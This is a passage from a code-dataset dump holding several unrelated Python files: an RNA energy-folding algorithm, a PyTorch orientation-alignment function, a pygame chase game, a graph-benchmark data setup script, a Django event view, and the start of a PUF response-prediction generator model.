\nmain()","sub_path":"2ºAno/2ºSemestre/LA2/progDinamica/somaMaxima.py","file_name":"somaMaxima.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16771026","text":"from energyD import *\nimport sys\n\n# Based on Zuker and Stiegler 1981: \"Optimal computer folding of large\n# RNA sequences using thermodynamics and auxiliary information\".\n# Charge 0 for bifurcation loops and all unpaired bases which aren't\n# part of loops.\n\nMINPAIRDIST=5\n\ndef efold(RNA, efD, fpD):\n '''RNA folding minimizing energy; recursive'''\n if len(RNA) < MINPAIRDIST + 1:\n return (float('inf'), [])\n if RNA in efD:\n return efD[RNA]\n else:\n # lose it case\n loseIt = efold(RNA[1:], efD, fpD)\n bestSoFar = (loseIt[0], adjust(loseIt[1], 1))\n # use it case\n for i in range(MINPAIRDIST, len(RNA)):\n if isComplement(RNA[0], RNA[i]):\n inside = fpfold(RNA[:i+1], fpD)\n rest = efold(RNA[i+1:], efD, fpD)\n if inside[0] == float('inf'):\n score = rest[0]\n elif rest[0] == float('inf'):\n score = inside[0]\n else:\n score = inside[0] + rest[0]\n if score < bestSoFar[0]:\n matches = inside[1]\n matches.extend(adjust(rest[1], i+1))\n bestSoFar = (score, matches)\n efD[RNA] = bestSoFar\n return bestSoFar\n\ndef isComplement(RNA1, RNA2):\n '''Boolean for whether or not the input bases are complementary.'''\n if RNA1 == RNA2:\n return False\n if RNA1 == 'A' and RNA2 == 'U':\n return True\n if RNA1 == 'U' and RNA2 == 'A':\n return True\n if RNA1 == 'C' and RNA2 == 'G':\n return True\n if RNA1 == 'G' and RNA2 == 'C':\n return True\n # else\n return False\n\ndef fpfold(RNA,fpD):\n '''Helper function for efold which tries to force the outer-most bases\n to pair. Assign infinite energy if not possible.'''\n if len(RNA) < MINPAIRDIST+1:\n return (float('inf'), [])\n if RNA in fpD:\n return fpD[RNA]\n else:\n bestSoFar = (hairpin(RNA), [(0, len(RNA)-1)])\n mySBI = sbiLoop(RNA, fpD)\n if mySBI[0] < bestSoFar[0]:\n bestSoFar = mySBI\n myBI = biloop(RNA, fpD)\n if myBI[0] < bestSoFar[0]:\n bestSoFar = myBI\n fpD[RNA] = bestSoFar\n return bestSoFar\n\ndef hairpin(RNA):\n '''Returns score of hairpin formed by given RNA. Does not call fpfold.'''\n if len(RNA) < MINPAIRDIST + 1:\n return float('inf')\n # start string to look up energy\n if RNA[0] == 'A' or RNA[0] == 'U':\n myStr = 'hairpinA'\n else:\n myStr = 'hairpinG'\n # finish string to look up energy\n if len(RNA) - 2 < 30:\n myStr += str(len(RNA) - 2)\n else:\n myStr += '30+'\n return energyD[myStr]\n\ndef sbiLoop(RNA,fpD):\n '''Returns best energy score and corresponding matches after testing\n stacking faces, bulge loop faces, and interior loop faces.'''\n if len(RNA) < MINPAIRDIST + 1:\n return (float('inf'), [])\n if RNA in fpD:\n return fpD[RNA]\n else:\n bestSoFar = (float('inf'), [])\n # STACKING FACE\n if isComplement(RNA[1], RNA[-2]):\n stackStr = RNA[0] + RNA[-1] + RNA[1] + RNA[-2]\n stackScore = energyD[stackStr]\n stackRecursion = fpfold(RNA[1:-1], fpD)\n stackRecursion = (stackRecursion[0], adjust(stackRecursion[1],1))\n if stackRecursion[0] != float('inf'):\n stackScore += stackRecursion[0]\n if stackScore < bestSoFar[0]:\n bestSoFar = (stackScore, list(set([(0, len(RNA)-1)] + stackRecursion[1] + [(1, len(RNA)-2)])))\n\n # BULGE LOOP FACE\n\n # start on second base\n for i in range(MINPAIRDIST+1, len(RNA)-2):\n if isComplement(RNA[1], RNA[i]):\n numUnpaired = len(RNA)-i-2\n if numUnpaired < 30:\n unpairedStr = 'bulge' + str(numUnpaired)\n else:\n unpairedStr = 'bulge' + '30+'\n bulgeStr = RNA[0] + RNA[-1] + RNA[1] + RNA[i]\n bulgeRecursion = fpfold(RNA[2:i+1], fpD)\n bulgeRecursion = (bulgeRecursion[0], adjust(bulgeRecursion[1],2))\n if bulgeRecursion[0] != float('inf'):\n bulgeScore = energyD[unpairedStr] + energyD[bulgeStr] + bulgeRecursion[0]\n else:\n bulgeScore = energyD[unpairedStr] + energyD[bulgeStr]\n\n if bulgeScore < bestSoFar[0]:\n bestSoFar = (bulgeScore, list(set([(0, len(RNA)-1)] + bulgeRecursion[1] + [(1, i)])))\n\n # end on second-to-last base\n for j in range(2, len(RNA)-1-MINPAIRDIST):\n if isComplement(RNA[j], RNA[-2]):\n numUnpaired = j-1\n if numUnpaired < 30:\n unpairedStr = 'bulge' + str(numUnpaired)\n else:\n unpairedStr = 'bulge' + '30+'\n bulgeStr = RNA[0] + RNA[-1] + RNA[j] + RNA[-2]\n bulgeRecursion = fpfold(RNA[j:len(RNA)-1], fpD)\n bulgeRecursion = (bulgeRecursion[0], adjust(bulgeRecursion[1],j))\n if bulgeRecursion[0] != float('inf'):\n bulgeScore = energyD[unpairedStr] + energyD[bulgeStr] + bulgeRecursion[0]\n else:\n bulgeScore = energyD[unpairedStr] + energyD[bulgeStr]\n\n if bulgeScore < bestSoFar[0]:\n bestSoFar = (bulgeScore, list(set([(0, len(RNA)-1)] + bulgeRecursion[1] + [(j, len(RNA)-2)])))\n\n # INTERIOR LOOP FACE\n for k in range(2,len(RNA)-MINPAIRDIST-2):\n for l in range(k+MINPAIRDIST, len(RNA)-2):\n if isComplement(RNA[k], RNA[l]):\n # start string to look up energy\n if RNA[0] == 'A' or RNA[0] == 'U':\n interiorStr = 'interiorA'\n else:\n interiorStr = 'interiorG'\n # Add second pair\n if RNA[k] == 'G' or RNA[k] == 'C':\n interiorStr += 'G'\n else:\n interiorStr += 'A'\n if interiorStr == 'interiorAG':\n interiorStr = 'interiorGA'\n # Add number of unpaired bases\n numUnpaired = (len(RNA)-2-l) + (k-1)\n if numUnpaired < 30:\n interiorStr += str(numUnpaired)\n else:\n interiorStr += '30+'\n\n interiorScore = energyD[interiorStr]\n interiorRecursion = fpfold(RNA[k:l+1], fpD)\n interiorRecursion = (interiorRecursion[0], adjust(interiorRecursion[1],k))\n if interiorRecursion[0] != float('inf'):\n interiorScore += interiorRecursion[0]\n\n if interiorScore < bestSoFar[0]:\n bestSoFar = (interiorScore, list(set([(0, len(RNA)-1)] + interiorRecursion[1] + [(k,l)])))\n fpD[RNA] = bestSoFar\n return bestSoFar\n\ndef biloop(RNA, fpD):\n ''' '''\n if len(RNA) < (2*MINPAIRDIST) + 4:\n return (float('inf'), [])\n if RNA in fpD:\n return fpD[RNA]\n else:\n bestSoFar = (float('inf'), [])\n # i: Loop through where the first loop can start\n for i in range(1, len(RNA)-(2*MINPAIRDIST)-2):\n # j: Loop through where the first loop can end\n for j in range(i+MINPAIRDIST, len(RNA)-MINPAIRDIST-2):\n if isComplement(RNA[i], RNA[j]):\n firstLoop = fpfold(RNA[i:j+1], fpD)\n firstLoop = (firstLoop[0], adjust(firstLoop[1],i))\n # k: Loop through where the second loop can start\n for k in range(j+1, len(RNA)-MINPAIRDIST-1):\n # l: Loop through where the second loop can end\n for l in range(k+MINPAIRDIST, len(RNA)-1):\n if isComplement(RNA[k],RNA[l]):\n secondLoop = fpfold(RNA[k:l+1], fpD)\n secondLoop = (secondLoop[0], adjust(secondLoop[1],k))\n thisScore = firstLoop[0] + secondLoop[0]\n if thisScore < bestSoFar[0]:\n bestSoFar = (thisScore, list(set(firstLoop[1]+secondLoop[1])))\n fpD[RNA] = bestSoFar\n return bestSoFar\n\ndef toVienna(RNA,sol):\n '''Convert efold output to the string format used by Vienna\n RNAplot.'''\n outL=[\".\"]*len(RNA)\n for pair in sol[1]:\n outL[pair[0]]='('\n outL[pair[1]]=')'\n return \"\".join(outL)\n\ndef adjust(pairsL, k):\n '''Add k to the coordinates in pairsL, returning a new list.'''\n newPairsL=[]\n for l,r in pairsL:\n newPairsL.append((l+k,r+k))\n return newPairsL\n\ndef energyFold(RNA):\n '''Wrapper to run energy based RNA folding.'''\n sol = efold(RNA,{},{})\n print(sol)\n print(RNA)\n print(toVienna(RNA,sol))\n","sub_path":"Fall2018/Bio188/hw8/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"484771433","text":"import re\nimport torch\nfrom torch.autograd import Function\nfrom .utils import FunctionBackend\nfrom .._ext import liborn\n\n\nclass ORAlign1d(Function):\n\n def __init__(self, nOrientation, return_direction=False):\n super(ORAlign1d, self).__init__()\n self.backend = FunctionBackend(liborn)\n self.nOrientation = nOrientation\n self.return_direction = return_direction\n\n def forward(self, input):\n mainDirection, output = input.new().byte(), input.new()\n self.backend.set_type(input.type())\n self.backend.RIE_AlignFeature(\n input, \n mainDirection, \n output, \n self.nOrientation)\n\n if self.return_direction:\n self.save_for_backward(input, mainDirection)\n self.mark_non_differentiable(mainDirection)\n return output, mainDirection\n else:\n self.save_for_backward(input)\n self.mainDirection = mainDirection\n return output\n\n def backward(self, grad_output):\n if self.return_direction:\n input, mainDirection = self.saved_tensors\n else:\n input, = self.saved_tensors\n mainDirection = self.mainDirection\n\n grad_input = input.new()\n self.backend.RIE_UnAlignFeature(\n grad_input, \n mainDirection, \n grad_output, \n self.nOrientation)\n return grad_input","sub_path":"install/orn/functions/RIE.py","file_name":"RIE.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"267134178","text":"import pygame\r\nimport random\r\nfrom Leikir import Messages, GamePlay\r\n\r\n\r\n#TODO/hugmyndir ?\r\n#(1) Bua til Mapp fyrir bakgrunninn i eltingaleiknum, eh cool byggt a muminheiminum.\r\n\r\n#(2) Baeta virknina sem akvardar hvort leikamdur nadi gullpening eda hvort morrinn nadi leikmanninum svo hun se nakvaemari.\r\n\r\n#(3) Lata leikmanninn komast a akvedinn stad eftir ad hann nadi gullpeningunum 10.\r\n\r\n#(4) Taka fram i leidbeiningum ad haegt se ad yta a P til ad fara i pasu\r\n\r\n#(5) Breyta thannig ad leikmadur komist ekki ut fyrir bordid nema a akvednum stodum, og komi tha ut aftur annarsstadar?\r\n\r\n#(6) Laga galla thegar leikmadur fer ut fyrir bordid og velur ad halda afram ad spila.\r\n\r\n\r\n\r\n\r\nclass Morrinn(Messages, GamePlay):\r\n \r\n leikm_x = 500\r\n leikm_y = 400\r\n stig = -1\r\n\r\n pygame.display.set_caption('Morrinn')\r\n image = pygame.image.load('morrinn.png')\r\n image2 = pygame.image.load('snudur.png')\r\n image3 = pygame.image.load('gullpeningur.png')\r\n \r\n\r\n def __init__(self):\r\n pass\r\n\r\n\r\n #Upphafsskjar\r\n def gameIntro(self):\r\n \r\n intro = True\r\n while intro:\r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_s:\r\n intro = False\r\n if event.key == pygame.K_h:\r\n pygame.quit()\r\n quit()\r\n \r\n self.gameDisplay.fill(self.white)\r\n self.screenMessage(\"Velkominn i bord 4\", self.black, -150, size = \"large\" ) \r\n self.screenMessage(\"Markmid leiksins er ad safna 10 gullpeningum og fordast morrann\", self.black, -70)\r\n self.screenMessage(\"Ef thu ferd ut fyrir rammann deyrdu\", self.black, -40)\r\n self.screenMessage(\"Yttu a S til ad spila eda H til ad haetta\", self.red, 20)\r\n \r\n \r\n pygame.display.update()\r\n self.clock.tick(15)\r\n #Birtir fjolda gullpeninga sem hefur verdi safnad\r\n def gameScore(self):\r\n text = self.small.render(\"Gullpeningar: \" + str(self.stig), True, self.black)\r\n self.gameDisplay.blit(text, [0,0])\r\n\r\n\r\n def gamePause(self):\r\n \r\n paused = True\r\n \r\n self.screenMessage(\"Pasa\", self.black, -100, size = \"large\")\r\n self.screenMessage(\"Yttu a A til ad halda afram eda H til ad haetta\", self.black, 25)\r\n pygame.display.update()\r\n \r\n \r\n while paused:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_a:\r\n paused = False\r\n elif event.key == pygame.K_h:\r\n pygame.quit()\r\n quit() \r\n self.clock.tick(5)\r\n \r\n #Skilar hnitum fyrir gullpening med slembinni stadsetningu\r\n def coinGenerator(self):\r\n self.stig += 1\r\n coin_x = random.randrange(0, self.display_width - 20)\r\n coin_y = random.randrange(0, self.display_height - 20) \r\n return coin_x, coin_y\r\n \r\n #Flaedi leiksins\r\n def gameLoop(self):\r\n gameExit = False\r\n gameOver = False\r\n gameWin = False\r\n\r\n morri_x = 0\r\n morri_y = 0\r\n delta_y = 0\r\n delta_x = 0\r\n \r\n CoinX, CoinY = self.coinGenerator()\r\n \r\n while not gameExit:\r\n \r\n #Thegar leikmadur hefur unnid!\r\n if gameWin == True:\r\n self.stig = -1\r\n self.gameDisplay.fill(self.white) \r\n self.screenMessage(\"THU VANNST!!\", self.red, -50, size = \"large\")\r\n self.screenMessage(\"S til ad spila aftur eda H til ad haetta\", self.black, 50, size = \"small\")\r\n pygame.display.update()\r\n \r\n while gameWin == True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n gameWin = False\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_h:\r\n gameExit = True\r\n gameWin = False\r\n if event.key == pygame.K_s:\r\n self.gameLoop()\r\n \r\n #Thegar leikmadur tapar!\r\n if gameOver == True:\r\n self.stig = -1\r\n self.screenMessage(\"Thu tapadir!!\", self.red, -50, size = \"large\")\r\n self.screenMessage(\"S til ad spila aftur eda H til ad haetta\", self.black, 50, size = \"small\")\r\n pygame.display.update()\r\n \r\n while gameOver == True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n gameOver = False\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_h:\r\n gameExit = True\r\n gameOver = False\r\n if event.key == pygame.K_s:\r\n self.gameLoop()\r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n \r\n #Hreyfing i hnitum leikmanns\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n delta_x = -10\r\n elif event.key == pygame.K_RIGHT:\r\n delta_x = 10\r\n elif event.key == pygame.K_UP:\r\n delta_y = -10\r\n elif event.key == pygame.K_DOWN:\r\n delta_y = 10\r\n \r\n \r\n #PASA, baeta inn leidbeiningum a upphafsskja ad leikmadur geti valid pasu.\r\n elif event.key == pygame.K_p:\r\n self.gamePause()\r\n \r\n \r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n delta_x = 0 \r\n if event.key == pygame.K_UP or event.key == pygame.K_DOWN:\r\n delta_y = 0 \r\n \r\n \r\n self.leikm_x += delta_x\r\n self.leikm_y += delta_y\r\n \r\n # Lata morrann elta leikmann\r\n if self.leikm_x < morri_x:\r\n morri_x -= 5\r\n elif self.leikm_x > morri_x:\r\n morri_x += 5 \r\n if self.leikm_y < morri_y:\r\n morri_y -= 5\r\n elif self.leikm_y > morri_y:\r\n morri_y += 5\r\n \r\n \r\n \r\n self.gameDisplay.fill(self.white) \r\n self.gameDisplay.blit(self.image3, [CoinX, CoinY, 20, 20])\r\n self.gameDisplay.blit(self.image2, [self.leikm_x,self.leikm_y, 30, 30] )\r\n self.gameDisplay.blit(self.image, [morri_x, morri_y, 30, 30] )\r\n self.gameScore()\r\n pygame.display.update()\r\n \r\n \r\n #Nadi leikmadur Pjening eda nadi Morrinn leikmanni?\r\n #Tharf ad eiga toluvert vid thetta \r\n if abs(self.leikm_x - CoinX) < 15 and abs(self.leikm_y - CoinY) < 15:\r\n CoinX, CoinY = self.coinGenerator()\r\n \r\n if abs(self.leikm_x - morri_x) < 25 and abs(self.leikm_y - morri_y) < 25:\r\n gameOver = True\r\n if self.leikm_x >= self.display_width or self.leikm_x < 0 or self.leikm_y >= self.display_height or self.leikm_y < 0:\r\n gameOver = True \r\n \r\n if self.stig == 10:\r\n gameWin = True\r\n \r\n self.clock.tick(20)\r\n \r\n pygame.quit()\r\n quit()\r\n\r\n\r\nLeikur4 = Morrinn()\r\nLeikur4.gameIntro() \r\nLeikur4.gameLoop()\r\n","sub_path":"Múmínálfarnir/Morrinn.py","file_name":"Morrinn.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"579053568","text":"import lzma\nimport tarfile\nimport os\nimport subprocess\nimport shutil\nimport urllib.request\nimport requests\nimport numpy as np\nfrom rdflib import Graph, URIRef, BNode\n\nfrom contextlib import closing\n\nGT_GRAPH_URL = 'http://www.cse.psu.edu/~kxm85/software/GTgraph/GTgraph.tar.gz'\nGT_GRAPH_ARCH = './tools/GTgraph.tar.gz'\n\nMEMORY_ALIASES_DOWNLOAD_ID = '1fVMY1rE7vX-bFWdP3CDTdjILDsELOXK0'\nRDF_DOWNLOAD_ID = '1ahY5P4UkJ9Fpg9EN6iT2_GQNsztTI2K3'\n\nSPARSE_GRAPH_TO_GEN = [[5000, 0.001], [10000, 0.001], [10000, 0.01], [10000, 0.1], [20000, 0.001], [40000, 0.001], [80000, 0.001]]\nFULL_GRAPH_TO_GEN = [10, 50, 100, 200, 500, 1000, 2000, 5000, 10000, 25000, 50000, 80000]\nNUMBER_OF_WORST_CASES = 12\nURI_PREFIX = 'http://example.org/'\n\nRDF = 'RDF'\nMEMORY_ALIASES = 'MemoryAliases'\nDATA_ROOT_DIR = './data/graphs/'\nMATRICES_DIR = 'Matrices'\nDATA_TO_UNPACK = [[MEMORY_ALIASES,MEMORY_ALIASES_DOWNLOAD_ID], [RDF,RDF_DOWNLOAD_ID]]\nGT_GRAPH = './tools/GTgraph/random/GTgraph-random'\nTMP_FILE = 'tmp.txt'\n\ndef download_file_from_google_drive(id, destination):\n URL = \"https://docs.google.com/uc?export=download\"\n\n session = requests.Session()\n\n response = session.get(URL, params = { 'id' : id }, stream = True)\n token = get_confirm_token(response)\n\n if token:\n params = { 'id' : id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n\n save_response_content(response, destination) \n\ndef get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef save_response_content(response, destination):\n CHUNK_SIZE = 32768\n\n with open(destination, \"wb\") as f:\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n\ndef download_data():\n print('Downloading from GDrive is started.')\n for f in DATA_TO_UNPACK: \n dst = os.path.join(os.path.join(DATA_ROOT_DIR,f[0]),os.path.join(MATRICES_DIR + '.tar.xz'))\n print('Download archive to ' + dst)\n download_file_from_google_drive(f[1], dst) \n print('Downloading from GDrive is finished.')\n \ndef unpack(file_from, path_to):\n with lzma.open(file_from) as f:\n with tarfile.open(fileobj=f) as tar:\n content = tar.extractall(path_to)\n\ndef install_gtgraph():\n print('Installation of GTgraph is started.')\n with urllib.request.urlopen(GT_GRAPH_URL) as response, open(GT_GRAPH_ARCH, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n print('GTgraph is downloaded.')\n tar = tarfile.open(GT_GRAPH_ARCH)\n tar.extractall('./tools')\n tar.close()\n\n subprocess.run(['sed', '-i', 's/CC = icc/#CC = icc/g', './tools/GTgraph/Makefile.var'])\n subprocess.run(['sed', '-i', 's/#CC = gcc/CC = gcc/g', './tools/GTgraph/Makefile.var'])\n subprocess.run(['make', '-C', './tools/GTgraph']) \n print('Installation of GTgraph is finished.') \n\ndef unpack_graphs():\n for d in DATA_TO_UNPACK:\n to = os.path.join(DATA_ROOT_DIR, d[0])\n arch = os.path.join(to, '%s.tar.xz'%(MATRICES_DIR))\n print ('Unpack ', arch, ' to ', to)\n unpack(arch, to)\n\n# RDF serialization\ndef write_to_rdf(target, graph):\n graph.serialize(target + '.xml', format='xml')\n\ndef add_rdf_edge(subj, pred, obj, graph):\n s = BNode('id-%s'%(subj))\n p = URIRef(URI_PREFIX + pred)\n o = BNode('id-%s'%(obj))\n graph.add((s, p, o))\n\ndef gen_sparse_graph(target_dir, vertices, prob):\n \n subprocess.run([GT_GRAPH, '-t', '0', '-n', '%s'%(vertices), '-p', '%s'%(prob), '-o', TMP_FILE])\n\n with open(TMP_FILE) as in_file:\n output_graph = Graph()\n target = os.path.join(target_dir, 'G%sk-%s'%(int(vertices/1000), prob))\n for l in in_file.readlines():\n if l.startswith('a '):\n a = l.split(' ')\n lbl = 'A' if int(a[3]) % 2 == 0 else 'AR'\n add_rdf_edge(a[1], lbl, a[2], output_graph)\n write_to_rdf(target, output_graph)\n\ndef gen_worst_case_graph(target_dir, vertices):\n first_cycle = int(vertices / 2) + 1\n output_graph = Graph()\n target = os.path.join(target_dir, 'worstcase_%s'%(vertices))\n \n for i in range(0, first_cycle - 1):\n add_rdf_edge(i, 'A', i + 1, output_graph)\n\n add_rdf_edge(first_cycle - 1, 'A', 0, output_graph) \n add_rdf_edge(first_cycle - 1, 'B', first_cycle, output_graph)\n for i in range(first_cycle, vertices - 1):\n add_rdf_edge(i, 'B', i + 1, output_graph)\n\n add_rdf_edge(vertices - 1, 'B', first_cycle - 1, output_graph)\n\n write_to_rdf(target, output_graph)\n\ndef gen_cycle_graph(target_dir, vertices):\n output_graph = Graph()\n target = os.path.join(target_dir, 'fullgraph_%s'%(vertices))\n\n for i in range(0, vertices - 1):\n add_rdf_edge(i, 'A', i + 1, output_graph)\n add_rdf_edge(vertices - 1, 'A', 0, output_graph)\n\n write_to_rdf(target, output_graph)\n\ndef gen_scale_free_graph(target_dir, n, k, labels):\n g = {\n i: [(j, np.random.choice(labels))\n for j in range(k)] for i in range(k)\n }\n degree = [3] * k\n\n for i in range(k, n):\n to_vertices = np.random.choice(range(i), size=k, replace=False, p=np.array(degree) / sum(degree))\n\n g[i] = []\n degree.append(0)\n for to in to_vertices:\n label = np.random.choice(labels)\n g[i].append((to, label))\n degree[to] += 1\n degree[i] += 1\n g[to].append((i, label))\n \n output_graph = Graph()\n target = os.path.join(target_dir, 'scale_free_graph_%s_%s')%(n, k)\n for v in g:\n for to in g[v]:\n add_rdf_edge(v, to[1], to[0], output_graph)\n \n write_to_rdf(target, output_graph)\n\ndef clean_dir(path):\n if os.path.isdir(path): \n shutil.rmtree(path)\n os.mkdir(path)\n\ndef generate_all_sparse_graphs():\n print('Sparse graphs generation is started.') \n\n matrices_dir = os.path.join(os.path.join(DATA_ROOT_DIR, 'SparseGraph'), MATRICES_DIR)\n clean_dir(matrices_dir)\n\n for g in SPARSE_GRAPH_TO_GEN: gen_sparse_graph(matrices_dir, g[0], g[1])\n print('Sparse graphs generation is finished.')\n\ndef generate_full_graphs():\n print('Full graphs generation is started.')\n matrices_dir = os.path.join(os.path.join(DATA_ROOT_DIR, 'FullGraph'), MATRICES_DIR)\n clean_dir(matrices_dir)\n \n for g in FULL_GRAPH_TO_GEN: gen_cycle_graph(matrices_dir, g)\n print('Full graphs generation is finished.')\n\ndef generate_worst_case_graphs():\n print('Worst case graphs generation is started.')\n matrices_dir = os.path.join(os.path.join(DATA_ROOT_DIR, 'WorstCase'), MATRICES_DIR)\n clean_dir(matrices_dir)\n \n for n in range(2, NUMBER_OF_WORST_CASES): gen_worst_case_graph(matrices_dir, 2 ** n)\n print('Worst case graphs generation is finished.')\n\ndef generate_scale_free_graphs():\n print('Scale free graphs generation is started.')\n matrices_dir = os.path.join(DATA_ROOT_DIR, 'ScaleFree', MATRICES_DIR)\n clean_dir(matrices_dir)\n\n for k in 1, 3, 5, 10:\n for n in 100, 500, 2500, 10000:\n gen_scale_free_graph(matrices_dir, n, k, ['a', 'b', 'c', 'd'])\n print('Scale free graphs generation is finished.')\n\ndef gen_sierpinski_graph(target_dir, degree, predicates=['A']):\n \"\"\" Generates a Sierpinski Triangle graph. \"\"\"\n \n def sierpinski(t, l, r, deg, preds, g):\n ''' Core function for generating the Sierpinski Triangle. '''\n if deg > 0:\n lt = next(ids)\n tr = next(ids)\n rl = next(ids)\n sierpinski(l, lt, rl, deg-1, preds, g)\n sierpinski(lt, t, tr, deg-1, preds, g)\n sierpinski(rl, tr, r, deg-1, preds, g)\n else:\n add_edges(l,t,preds,g)\n add_edges(t,r,preds,g)\n add_edges(r,l,preds,g)\n \n def add_edges(u,v,preds,g):\n ''' Adds edges between vertices u and v for all predicates. '''\n for p in preds:\n g += [[u,p,v]]\n g += [[v,p,u]]\n \n def _idgen():\n ''' Generates integer identifiers for vertices. '''\n c = 4\n while True:\n yield c\n c += 1\n \n ids = _idgen()\n graph = []\n sierpinski(1,2,3,degree,predicates, graph) \n with open(os.path.join(target_dir, 'sierpinskigraph_%s.txt'%(degree)), 'w') as out_file:\n for triple in graph:\n out_file.write('%s %s %s \\n'%(triple[0], triple[1], triple[2]))\n\nif __name__ == '__main__':\n install_gtgraph()\n download_data()\n unpack_graphs()\n generate_all_sparse_graphs()\n generate_full_graphs()\n generate_worst_case_graphs()\n generate_scale_free_graphs()\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":8743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"405744445","text":"from models import Event, Presence\nfrom django.core.context_processors import csrf\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import Context, loader\nfrom django.core.exceptions import ObjectDoesNotExist\n\ndef eventDetails(request, **args):\n t = loader.get_template('eventdetails.view')\n\n user = request.user\n \n c = { 'event' : None, 'can_delete' : False }\n c.update(csrf(request))\n\n event = None\n if 'id' in args:\n event = Event.objects.get(id = int(args['id']))\n event.loadThreads()\n\n if event:\n c['event'] = event\n c['can_delete'] = can_delete(user, args)\n c['can_attend'] = False\n\n if event and 'delete' in request.POST and can_delete(user, args):\n event.delete()\n return HttpResponseRedirect('/kalender/')\n\n if event and 'present' in request.POST and can_be_present(user, args):\n presence = Presence()\n presence.user = user\n presence.event = event\n presence.save()\n return HttpResponseRedirect('/evenement/%s/' % (event.id))\n \n if event and user.is_authenticated():\n c['can_attend'] = True\n c['attendees'] = [\"%s %s\" % (p.user.first_name, p.user.last_name) for p in Presence.objects.filter(event__id = event.id)]\n\n return HttpResponse(t.render(Context(c)))\n\ndef can_be_present(user, event):\n return user.is_authenticated() and not Event.objects.filter(presence__user__id = user.id)\n\ndef can_delete(user, args):\n try:\n return user.is_authenticated() and Event.objects.filter(acluserevent__user__id = user.id).get(id = int(args['id']))\n except ObjectDoesNotExist:\n return False\n","sub_path":"GameCalendar/eventcontrol.py","file_name":"eventcontrol.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"553916385","text":"import itertools\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom pytorch_ssim import ssim\n\nfrom non_linear.modules.cropped.Cropped_Generator_type1_module import Generator as Generator_Cropped_type1\nfrom non_linear.modules.cropped.Cropped_Generator_type2_module import Generator as Generator_Cropped_type2\nfrom non_linear.modules.normal.Generator_module import Generator\nfrom non_linear.utils.utils import calc_pc, weights_init, calc_ssim\nfrom utils import utils\n\n\nclass GeneratorModel(LightningModule):\n \"\"\"\n DL model for the generator attack. After training, the pearson correlation coefficient, structural similarity index\n and fractional hamming distance for each real and predicted response pair of the test set are computed.\n \"\"\"\n\n def __init__(self, hparams, img_size, crop_size, c_bits, denormalize, do_crop, crop_type2, custom_gabor):\n \"\"\"\n Initializes the generator.\n\n :param hparams: hyperparameters that are used for the model\n :param img_size: size of the responses\n :param crop_size: size to which the responses will be cropped if decided to\n :param c_bits: number of bits of a challenge\n :param denormalize: inverse function of the normalization applied to the responses for the DL attack\n :param do_crop: whether to crop the responses\n :param crop_type2: whether to use the cropped generator type 2\n :param custom_gabor: whether to use the second gabor transformation\n \"\"\"\n super().__init__()\n self.hparams = hparams\n self.c_bits = c_bits\n self.denormalize = denormalize\n self.crop = do_crop\n self.img_size = img_size\n self.crop_size = crop_size\n self.custom_gabor = custom_gabor\n\n if do_crop:\n if crop_type2:\n generator = Generator_Cropped_type2(c_bits, self.hparams.gen_ns)\n else:\n generator = Generator_Cropped_type1(c_bits, self.hparams.gen_ns)\n else:\n generator = Generator(c_bits, self.hparams.gen_ns)\n\n self.generator = generator\n self.generator.apply(weights_init)\n\n def gen_loss_function(self, real_response, gen_response):\n \"\"\"\n Loss function of the generator. Uses a same-weighted combination of MSE and the SSIM.\n\n :param real_response: real response of the dataset\n :param gen_response: generated response of the generator\n :return: loss for the prediction\n \"\"\"\n normalized_real = self.denormalize(real_response)\n normalized_gen = self.denormalize(gen_response)\n mse_criterion = nn.MSELoss()\n\n ssim_loss = 1 - ssim(normalized_real, normalized_gen)\n mse_loss = mse_criterion(real_response, gen_response)\n\n return ssim_loss, mse_loss\n\n def training_step(self, batch, batch_idx):\n real_challenge, real_response = batch\n gen_response = self.generator(real_challenge)\n\n ssim_loss, mse_loss = self.gen_loss_function(real_response, gen_response)\n loss = ssim_loss + mse_loss\n\n return {'ssim_loss': ssim_loss,\n 'mse_loss': mse_loss,\n 'loss': loss}\n\n def test_step(self, batch, batch_idx):\n challenge, real_response = batch\n gen_response = self.generator(challenge)\n\n normalized_real = self.denormalize(real_response)\n normalized_gen = self.denormalize(gen_response)\n\n ssims = calc_ssim(normalized_real, normalized_gen, keep_first_dim=True)\n pear_coeffs = calc_pc(real_response, gen_response, keep_first_dim=True)\n\n 